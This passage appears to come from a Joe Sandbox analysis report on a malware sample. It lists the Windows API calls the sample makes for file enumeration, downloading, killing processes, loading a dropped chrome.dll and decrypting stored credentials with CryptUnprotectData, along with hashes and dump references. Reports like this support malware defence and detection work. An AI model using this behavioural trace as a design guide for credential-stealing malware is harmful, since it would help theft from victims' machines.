                                                                                                • API ID: Find$File$CloseFirstNextwsprintf
                                                                                                • String ID: %s\%s
                                                                                                • API String ID: 180737720-4073750446
                                                                                                • Opcode ID: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                                                                                • Instruction ID: fabef74ebea8da44b501a85f582971371f90885c40acf49b74ac124388ccf1e1
                                                                                                • Opcode Fuzzy Hash: 9d44ee2d1d3302ed3f560bb1c24b0dbad1817cb41e0c40033f90fa3194e93cf6
                                                                                                • Instruction Fuzzy Hash: 745179B1904118ABCB24EBB0DD45EEA737DBB58304F4045DEB60996090EB74ABC5CF59
                                                                                                APIs
                                                                                                • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040501A
                                                                                                • RtlAllocateHeap.NTDLL(00000000), ref: 00405021
                                                                                                • InternetOpenA.WININET(00420DE3,00000000,00000000,00000000,00000000), ref: 0040503A
                                                                                                • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00405061
                                                                                                • InternetReadFile.WININET(+aA,?,00000400,00000000), ref: 00405091
                                                                                                • memcpy.MSVCRT(00000000,?,00000001), ref: 004050DA
                                                                                                • InternetCloseHandle.WININET(+aA), ref: 00405109
                                                                                                • InternetCloseHandle.WININET(?), ref: 00405116
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessReadmemcpy
                                                                                                • String ID: +aA$+aA
                                                                                                • API String ID: 1008454911-2425922966
                                                                                                • Opcode ID: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                                                                                • Instruction ID: fde31ff110f26a7c533ed41685ed538a2d60c52cc522202a3453e975d8f44226
                                                                                                • Opcode Fuzzy Hash: 2054dbe4896dccbf1b25db0542e201d3eadf361b24acad6cfbdf1ee3c924dd12
                                                                                                • Instruction Fuzzy Hash: 193136B4E01218ABDB20CF54DC85BDDB7B5EB48304F1081EAFA09A7281D7746AC18F9D
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042523C,?,00401F6C,?,004252E4,?,?,00000000,?,00000000), ref: 00401963
                                                                                                • StrCmpCA.SHLWAPI(?,0042538C), ref: 004019B3
                                                                                                • StrCmpCA.SHLWAPI(?,00425434), ref: 004019C9
                                                                                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D80
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00401E0A
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E60
                                                                                                • FindClose.KERNEL32(000000FF), ref: 00401E72
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                                • String ID: \*.*
                                                                                                • API String ID: 1415058207-1173974218
                                                                                                • Opcode ID: fb5e4da87126f439d0ba2410e22736a4b7d08ec171709da3f27cccb680b52614
                                                                                                • Instruction ID: df326988fd69e0da1611ef2be43153edb0d5c51867ec3eea105421fd5dfb977f
                                                                                                • Opcode Fuzzy Hash: fb5e4da87126f439d0ba2410e22736a4b7d08ec171709da3f27cccb680b52614
                                                                                                • Instruction Fuzzy Hash: F5125171A111189BCB15FB61DCA6EEE7339AF14314F4045EEB10662091EF386BD8CFA9
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                • GetProcAddress.KERNEL32(6CFA0000,connect_to_websocket), ref: 0040A0BE
                                                                                                • GetProcAddress.KERNEL32(6CFA0000,free_result), ref: 0040A0D5
                                                                                                • FreeLibrary.KERNEL32(6CFA0000,?,004108E4), ref: 0040A0F9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryProc$FreeLoad
                                                                                                • String ID: C:\ProgramData\chrome.dll$connect_to_websocket$free_result
                                                                                                • API String ID: 2256533930-1545816527
                                                                                                • Opcode ID: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                • Instruction ID: 41317d004e32df3368e0b40b2df30f060e9b3f1c7a199a11b2b6647de007d5a9
                                                                                                • Opcode Fuzzy Hash: 7a0dc9a98ac853a9b738e9b56338bc9d7e27e39a5dbcb03120cd0e56dd10277b
                                                                                                • Instruction Fuzzy Hash: 57F01DB4E0E324EFD7009B60ED48B563BA6E318341F506437F505AB2E0E3B85494CB6B
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00419905
                                                                                                • Process32First.KERNEL32(00409FDE,00000128), ref: 00419919
                                                                                                • Process32Next.KERNEL32(00409FDE,00000128), ref: 0041992E
                                                                                                • StrCmpCA.SHLWAPI(?,00409FDE), ref: 00419943
                                                                                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0041995C
                                                                                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 0041997A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00419987
                                                                                                • CloseHandle.KERNEL32(00409FDE), ref: 00419993
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 2696918072-0
                                                                                                • Opcode ID: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                • Instruction ID: 9e175830caf9148bd7a219e001ec971bef60eefc02138b6d75eb658f8e5d4480
                                                                                                • Opcode Fuzzy Hash: 70d4dbc2df0c449e42b531910b7457683d7e33f1b1efd4492f1c83a3618bacdf
                                                                                                • Instruction Fuzzy Hash: 94112EB5E15218ABCB24DFA0DC48BDEB7B9BB48700F00558DF509A6240EB749B84CF91
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                  • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                  • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00420D79), ref: 0040E5A2
                                                                                                • StrCmpCA.SHLWAPI(?,004215F0), ref: 0040E5F2
                                                                                                • StrCmpCA.SHLWAPI(?,004215F4), ref: 0040E608
                                                                                                • FindNextFileA.KERNEL32(000000FF,?), ref: 0040ECDF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                                                                                • String ID: \*.*$@
                                                                                                • API String ID: 433455689-2355794846
                                                                                                • Opcode ID: f47e142a0e0eda43e20b824a082bfd3b09faa894479a78cb414dd1fa94ebedbf
                                                                                                • Instruction ID: 078a0cb4b8b1302ba7a9d85fb6124db0b21cd0ebb254cebb7c4a92464ee22dab
                                                                                                • Opcode Fuzzy Hash: f47e142a0e0eda43e20b824a082bfd3b09faa894479a78cb414dd1fa94ebedbf
                                                                                                • Instruction Fuzzy Hash: A6128431A111185BCB14FB61DCA6EED7339AF54314F4045EFB10A62095EF386F98CB9A
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • GetKeyboardLayoutList.USER32(00000000,00000000,004205B7), ref: 00417D71
                                                                                                • LocalAlloc.KERNEL32(00000040,?), ref: 00417D89
                                                                                                • GetKeyboardLayoutList.USER32(?,00000000), ref: 00417D9D
                                                                                                • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00417DF2
                                                                                                • LocalFree.KERNEL32(00000000), ref: 00417EB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                                                                                • String ID: /
                                                                                                • API String ID: 3090951853-4001269591
                                                                                                • Opcode ID: 4ce6c5960e953ca50323f0ea1acf36ade6e45c06422b9d08be3399a65e492270
                                                                                                • Instruction ID: 3a7f69f4b1fea99afaf6d133ce9a777b30b3333c02d8fb4e8698743120f63e4e
                                                                                                • Opcode Fuzzy Hash: 4ce6c5960e953ca50323f0ea1acf36ade6e45c06422b9d08be3399a65e492270
                                                                                                • Instruction Fuzzy Hash: 1C416D71945218ABCB24DB94DC99BEEB374FF44704F2041DAE10A62280DB386FC4CFA9
                                                                                                APIs
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004197AE
                                                                                                • Process32First.KERNEL32(00420ACE,00000128), ref: 004197C2
                                                                                                • Process32Next.KERNEL32(00420ACE,00000128), ref: 004197D7
                                                                                                • StrCmpCA.SHLWAPI(?,00000000), ref: 004197EC
                                                                                                • CloseHandle.KERNEL32(00420ACE), ref: 0041980A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                • String ID:
                                                                                                • API String ID: 420147892-0
                                                                                                • Opcode ID: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                • Instruction ID: 1fbe04e52da5ee7ffdaa7b0a109f2e7c212eef70923f216ae4cda371332784c4
                                                                                                • Opcode Fuzzy Hash: ab7854b09e34a3e72564da4cae313691c3db6a0f4efd60600c229a2cf8e43cf1
                                                                                                • Instruction Fuzzy Hash: 49010C75E15209EBDB20DFA4CD54BDEB7B9BB08700F14469AE50996240E7349F80CF61
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd
                                                                                                Similarity
                                                                                                • API ID: strcmp
                                                                                                • String ID: BINARY$NOCASE$RTRIM$kqa$main
                                                                                                • API String ID: 1004003707-114998471
                                                                                                • Opcode ID: 18f930d9ebde0cca1a2286de30ce105b028a00d416d2753ad386fb247e597bcb
                                                                                                • Instruction ID: 60bcc8b0197c989f7013f8b1edc5a9d28cf944306873f66ca73508c1f88d5ce1
                                                                                                • Opcode Fuzzy Hash: 18f930d9ebde0cca1a2286de30ce105b028a00d416d2753ad386fb247e597bcb
                                                                                                • Instruction Fuzzy Hash: DEE149B4A087858BEB00DF68C59474ABBF1BF89308F24C86DEC989F395D779C8458B51
                                                                                                APIs
                                                                                                  • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,004205BF), ref: 0041885A
                                                                                                • Process32First.KERNEL32(?,00000128), ref: 0041886E
                                                                                                • Process32Next.KERNEL32(?,00000128), ref: 00418883
                                                                                                  • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                  • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                  • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                  • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                • CloseHandle.KERNEL32(?), ref: 004188F1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                                • String ID:
                                                                                                • API String ID: 1066202413-0
                                                                                                • Opcode ID: 1b96575a9a8ef5cfbd7df53b8feb98b6c73a13c60764a44f76fb77771f8b5c76
                                                                                                • Instruction ID: f2962352e5a9518fad6621e76df9ccdb14d3c152e16a9ee82315e1f5505f4b94
                                                                                                • Opcode Fuzzy Hash: 1b96575a9a8ef5cfbd7df53b8feb98b6c73a13c60764a44f76fb77771f8b5c76
                                                                                                • Instruction Fuzzy Hash: 0E318171A02158ABCB24DF55DC55FEEB378EF04714F50419EF10A62190EB386B84CFA5
                                                                                                APIs
                                                                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0040A2D4
                                                                                                • LocalAlloc.KERNEL32(00000040,00000000), ref: 0040A2F3
                                                                                                • memcpy.MSVCRT(?,?,?), ref: 0040A316
                                                                                                • LocalFree.KERNEL32(?), ref: 0040A323
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
